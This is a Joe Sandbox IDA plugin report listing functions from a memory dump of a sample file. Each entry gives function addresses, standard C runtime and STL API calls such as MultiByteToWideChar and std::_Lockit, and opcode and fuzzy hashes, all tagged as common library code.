Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: fb1a4664757f191ce2697eff48f5dabdba5933277401d69d7126fd894b2a86e7
Instruction ID: 4f418ff98d4358780070ff0640a6f5e7ac507b8127daabb59e0e289812450d68
Opcode Fuzzy Hash: fb1a4664757f191ce2697eff48f5dabdba5933277401d69d7126fd894b2a86e7
Instruction Fuzzy Hash: 5971CF7A908219ABEF609F64C885FAF7BB5AF05354F14011EE940A6391D73D8D01CFA9

Function 004AAB47 Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 004AAB90
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 004AABFB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AAC18
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004AAC57
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AACB6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004AACD9

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 5ffe9a9e9f12bc47b24eefc8a96e3ae22f893a228b5ce4fe64785ca9dbfa53cc
Instruction ID: ca9e61514ca20fa936f734a5d467cb8106afb13791449872e22f8392d14f54fa
Opcode Fuzzy Hash: 5ffe9a9e9f12bc47b24eefc8a96e3ae22f893a228b5ce4fe64785ca9dbfa53cc
Instruction Fuzzy Hash: 5851E77250021AAFEF208F60CC45FAF7BA9EF62750F14411AFD05D6290DB389D61DB69

Function 004CD9C8 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004CD9BF,004CA44E,004C8EA3), ref: 004CD9D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004CD9E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004CD9FD
SetLastError.KERNEL32(00000000,004CD9BF,004CA44E,004C8EA3), ref: 004CDA4F

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 89397712c999fac42af726b0fc4bf4dabe80b66591990581de5a09b65a91cbf6
Instruction ID: 875bb1b18b220a94451ee0e2a6633974fc79208a55c82ba2fa5eeecc6e51af63
Opcode Fuzzy Hash: 89397712c999fac42af726b0fc4bf4dabe80b66591990581de5a09b65a91cbf6
Instruction Fuzzy Hash: F101283660C211AE976826B97C9AF6B2695EB11739720033FF110493E1EE3A5C05E55C

Function 004A8300 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A8307
std::_Lockit::_Lockit.LIBCPMT ref: 004A8311
int.LIBCPMT ref: 004A8328

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004A8362
std::_Lockit::~_Lockit.LIBCPMT ref: 004A8382
Concurrency::cancel_current_task.LIBCPMT ref: 004A838F

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: deb2705ae9bf840719c79ee3d8c2f635ea815b8d02994265ae7544e1a9686fdf
Instruction ID: d957448a12a34087e26fb8a136f783d826345badff94cc54cd0c2b76fa9b3f61
Opcode Fuzzy Hash: deb2705ae9bf840719c79ee3d8c2f635ea815b8d02994265ae7544e1a9686fdf
Instruction Fuzzy Hash: 4F01C47A9002198BDF05EB659805AAEB7B5BF65725F14000FF80067392DF789E05CB89

Function 004A8395 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A839C
std::_Lockit::_Lockit.LIBCPMT ref: 004A83A6
int.LIBCPMT ref: 004A83BD

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004A83F7
std::_Lockit::~_Lockit.LIBCPMT ref: 004A8417
Concurrency::cancel_current_task.LIBCPMT ref: 004A8424

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: dab167e064b8339481205e21ccc438dc0ce0f29d0e80f5edf376b3f0c2ef9d7d
Instruction ID: 5d1cda82105ad2ba5360f65601fcbce6b1ec2b8af8f7c003c2b6c3e1179a6093
Opcode Fuzzy Hash: dab167e064b8339481205e21ccc438dc0ce0f29d0e80f5edf376b3f0c2ef9d7d
Instruction Fuzzy Hash: 0B01C47A9002198BDB04EB659806AAEB7B5FF65715F14000FF8016B392EF7C9E058B99

Function 004B4C1E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4C25
std::_Lockit::_Lockit.LIBCPMT ref: 004B4C2F
int.LIBCPMT ref: 004B4C46

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B4C80
std::_Lockit::~_Lockit.LIBCPMT ref: 004B4CA0
Concurrency::cancel_current_task.LIBCPMT ref: 004B4CAD

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: b88e058fefdb624b3f2aaf2dc0ff7e41e0b198f45351464e599aff7b35de9209
Instruction ID: 91d55d84348ea5bdca70d139e3a44dd260c0b964dc97bb193e40f70861aff33e
Opcode Fuzzy Hash: b88e058fefdb624b3f2aaf2dc0ff7e41e0b198f45351464e599aff7b35de9209
Instruction Fuzzy Hash: 2E01043A900219DBCB05EFA4C805AAE7BB1BFA5718F15000FF4106B392DF389E058B99

Function 004B4CB3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4CBA
std::_Lockit::_Lockit.LIBCPMT ref: 004B4CC4
int.LIBCPMT ref: 004B4CDB

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B4D15
std::_Lockit::~_Lockit.LIBCPMT ref: 004B4D35
Concurrency::cancel_current_task.LIBCPMT ref: 004B4D42

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: ddfa9080b69559483d3508db228b177e0b22ae8e7b7c715a0852a1000a40ac64
Instruction ID: fab8b80a79f0c57d6bebaa8afbad2ab065de06b3de6672962223a1892e9cbc40
Opcode Fuzzy Hash: ddfa9080b69559483d3508db228b177e0b22ae8e7b7c715a0852a1000a40ac64
Instruction Fuzzy Hash: CA01043A9002158BCB00EB658815BAEB7B4AFA0714F24400FF8016B382DF3C9E05CB99

Function 004C3128 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C312F
std::_Lockit::_Lockit.LIBCPMT ref: 004C3139
int.LIBCPMT ref: 004C3150

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004C318A
std::_Lockit::~_Lockit.LIBCPMT ref: 004C31AA
Concurrency::cancel_current_task.LIBCPMT ref: 004C31B7

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4f565217b1fe19763ee8b5c52c256e0d584c630260507052db64bb3b15ec9e15
Instruction ID: 963d27073e485f69296936c5663998325bcfad99b938eb40cce6e873ae1e8d27
Opcode Fuzzy Hash: 4f565217b1fe19763ee8b5c52c256e0d584c630260507052db64bb3b15ec9e15
Instruction Fuzzy Hash: CC01E17A9002158BCB04EFA49805BBEB7B0BFA171AF18400EF4006B391DF389F048B89

Function 004C3252 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C3259
std::_Lockit::_Lockit.LIBCPMT ref: 004C3263
int.LIBCPMT ref: 004C327A

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004C32B4
std::_Lockit::~_Lockit.LIBCPMT ref: 004C32D4
Concurrency::cancel_current_task.LIBCPMT ref: 004C32E1

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4489451780dd36e5ba3ce15ba4185da00099c0fefaea52f5f3847dcdf97cc162
Instruction ID: 6fce93b8b62edd167b495975f370396bfd347646e27b854bbd56f9dd82a21e89
Opcode Fuzzy Hash: 4489451780dd36e5ba3ce15ba4185da00099c0fefaea52f5f3847dcdf97cc162
Instruction Fuzzy Hash: 2E01A5399042158BCB44EF559815BAEB7B0AF65716F14404FF40167391DF78AE05CB89

Function 004C32E7 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C32EE
std::_Lockit::_Lockit.LIBCPMT ref: 004C32F8
int.LIBCPMT ref: 004C330F

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004C3349
std::_Lockit::~_Lockit.LIBCPMT ref: 004C3369
Concurrency::cancel_current_task.LIBCPMT ref: 004C3376

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 645c22c79ac20a1b3ca83227586ea390c52012efa5ccd7110f6b34e0357a67d2
Instruction ID: e0e8ac175c87e16bd0793df57b509cef28c653ba0ec3e5fdefd53f5d23e45e02
Opcode Fuzzy Hash: 645c22c79ac20a1b3ca83227586ea390c52012efa5ccd7110f6b34e0357a67d2
Instruction Fuzzy Hash: 0D01E13AD002198BCB00EF649815BAEB771BF61325F14400FF800672A2DF389F058B99

Function 004B5444 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B544B
std::_Lockit::_Lockit.LIBCPMT ref: 004B5455
int.LIBCPMT ref: 004B546C

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B54A6
std::_Lockit::~_Lockit.LIBCPMT ref: 004B54C6
Concurrency::cancel_current_task.LIBCPMT ref: 004B54D3

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: c299972f65ce3f883617c56c701448f7ac4cad561e9a0aa3817153ed0776d132
Instruction ID: 262f9ba3d338381c539b9fd51f8e117436d77f765c7c2084c9d7c1cfa6954f24
Opcode Fuzzy Hash: c299972f65ce3f883617c56c701448f7ac4cad561e9a0aa3817153ed0776d132
Instruction Fuzzy Hash: B201047A9006198BCB04EFA0D805BAEB7B0AFA5715F24044FF40167392DF389E058BA8

Function 004B54D9 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B54E0
std::_Lockit::_Lockit.LIBCPMT ref: 004B54EA
int.LIBCPMT ref: 004B5501

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B553B
std::_Lockit::~_Lockit.LIBCPMT ref: 004B555B
Concurrency::cancel_current_task.LIBCPMT ref: 004B5568

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: eaee7e0839a382d0fbf0176a3814841c93bbf0c465c10749b5a95f29b7ce6552
Instruction ID: 74007d3d8f861828fba8b9cb4ec104b1997e0df24b4533547bbfbfe6d34e6376
Opcode Fuzzy Hash: eaee7e0839a382d0fbf0176a3814841c93bbf0c465c10749b5a95f29b7ce6552
Instruction Fuzzy Hash: E601047A9006159BCB10EB649805BEEB7B1BF60726F24010FF4006B381DF389E058B98

Function 004C34A6 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C34AD
std::_Lockit::_Lockit.LIBCPMT ref: 004C34B7
int.LIBCPMT ref: 004C34CE

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004C3508
std::_Lockit::~_Lockit.LIBCPMT ref: 004C3528
Concurrency::cancel_current_task.LIBCPMT ref: 004C3535

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 08e2befd44a54fd6347a8cbffceb1787f4c3fbea85936a02c61b94b239b70c7d
Instruction ID: 4081990acb0a2865fcee1d22cdca0a74ade7a78975071cb66a0b636015c45332
Opcode Fuzzy Hash: 08e2befd44a54fd6347a8cbffceb1787f4c3fbea85936a02c61b94b239b70c7d
Instruction Fuzzy Hash: C101043A9002159BCB04EF659815BBEB770AF65715F14440FF4006B382DF389F05CB89

Function 004B556E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B5575
std::_Lockit::_Lockit.LIBCPMT ref: 004B557F
int.LIBCPMT ref: 004B5596

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B55D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004B55F0
Concurrency::cancel_current_task.LIBCPMT ref: 004B55FD

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 3784e3a44ec89706efcced2e1e7a683132d2f5407e00a17633cb3f3d08adfc56
Instruction ID: a4373e557e00a1c2ad06baf36b7a82c0573ae793e563d6fd0326df829c7ec94c
Opcode Fuzzy Hash: 3784e3a44ec89706efcced2e1e7a683132d2f5407e00a17633cb3f3d08adfc56
Instruction Fuzzy Hash: A301E17A9006199BDB10EF65C845BEEB771AF55725F14000FF40167392EF389E05CB98

Function 004C353B Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C3542
std::_Lockit::_Lockit.LIBCPMT ref: 004C354C
int.LIBCPMT ref: 004C3563

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004C359D
std::_Lockit::~_Lockit.LIBCPMT ref: 004C35BD
Concurrency::cancel_current_task.LIBCPMT ref: 004C35CA

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: aaaef97cba9c89e1b52647f84b0d558dae16fc776775199853f60a58e428a050
Instruction ID: 3f077b74b8e114d84e2edb2f414656e28b765d0a4c5d53b6a2fc08b852ce5f28
Opcode Fuzzy Hash: aaaef97cba9c89e1b52647f84b0d558dae16fc776775199853f60a58e428a050
Instruction Fuzzy Hash: 0A01E13E9002199BCB00EF619815BAE77B1BF6572AF14444FF8006B292DF389F058B89

Function 004B5603 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B560A
std::_Lockit::_Lockit.LIBCPMT ref: 004B5614
int.LIBCPMT ref: 004B562B

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B5665
std::_Lockit::~_Lockit.LIBCPMT ref: 004B5685
Concurrency::cancel_current_task.LIBCPMT ref: 004B5692

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
